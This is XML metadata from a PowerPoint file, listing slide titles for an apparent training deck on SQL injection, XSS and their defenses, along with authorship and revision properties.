      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Advance SQL Injection 1</vt:lpstr>
      <vt:lpstr>Multibyte Character sets</vt:lpstr>
      <vt:lpstr>For Example: GBK</vt:lpstr>
      <vt:lpstr>For Example: GBK</vt:lpstr>
      <vt:lpstr>For Example: GBK</vt:lpstr>
      <vt:lpstr>Multibyte parsing in PHP &amp; MySQL</vt:lpstr>
      <vt:lpstr>Sanitization with PHP</vt:lpstr>
      <vt:lpstr>Parsing by MySQL</vt:lpstr>
      <vt:lpstr>Multibyte SQL Injection</vt:lpstr>
      <vt:lpstr>JFYI</vt:lpstr>
      <vt:lpstr>Advance SQL Injection 2</vt:lpstr>
      <vt:lpstr>UNION SELECT SQL Injection</vt:lpstr>
      <vt:lpstr>UNION SELECT SQL Injection</vt:lpstr>
      <vt:lpstr>UNION SELECT SQL Injection</vt:lpstr>
      <vt:lpstr>UNION SELECT SQL Injection</vt:lpstr>
      <vt:lpstr>UNION SELECT SQL Injection</vt:lpstr>
      <vt:lpstr>UNION SELECT SQL Injection</vt:lpstr>
      <vt:lpstr>UNION SELECT SQL Injection</vt:lpstr>
      <vt:lpstr>Questions so far?</vt:lpstr>
      <vt:lpstr>General SQLi Defenses</vt:lpstr>
      <vt:lpstr>Reference - OWASP Top 10</vt:lpstr>
      <vt:lpstr>Hands On Time</vt:lpstr>
      <vt:lpstr>Hands On Time</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The Challenge</vt:lpstr>
      <vt:lpstr>Challenges Instructions</vt:lpstr>
      <vt:lpstr>Hints ahead</vt:lpstr>
      <vt:lpstr>Challenges Hints</vt:lpstr>
      <vt:lpstr>The Solution Flow</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Appendix: Reference - OWASP Top 10</vt:lpstr>
      <vt:lpstr>Appendix: Reference - OWASP Top 10</vt:lpstr>
      <vt:lpstr>Appendix: Reference - OWASP Top 10</vt:lpstr>
      <vt:lpstr>Appendix: Reference - OWASP Top 10</vt:lpstr>
      <vt:lpstr>Appendix: Reference - OWASP Top 10</vt:lpstr>
      <vt:lpstr>Appendix: Reference - OWASP Top 10</vt:lpstr>
      <vt:lpstr>Appendix: Reference - OWASP Top 10</vt:lpstr>
      <vt:lpstr>Appendix: Reference - OWASP Top 10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XSS</dc:title>
  <dc:creator>Yu-Lu Liu</dc:creator>
  <cp:lastModifiedBy>Hsieh, ChiaLung | Albert | CSDD</cp:lastModifiedBy>
  <cp:revision>364</cp:revision>
  <cp:lastPrinted>2012-11-01T00:53:12Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-24T20:26:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-08T02:18:19Z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8D7E3DA9-C95F-4DFF-0067-D70018B400B7</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ArticulatePath">
    <vt:lpwstr>20170205</vt:lpwstr>
  </property>
</Properties>
</file>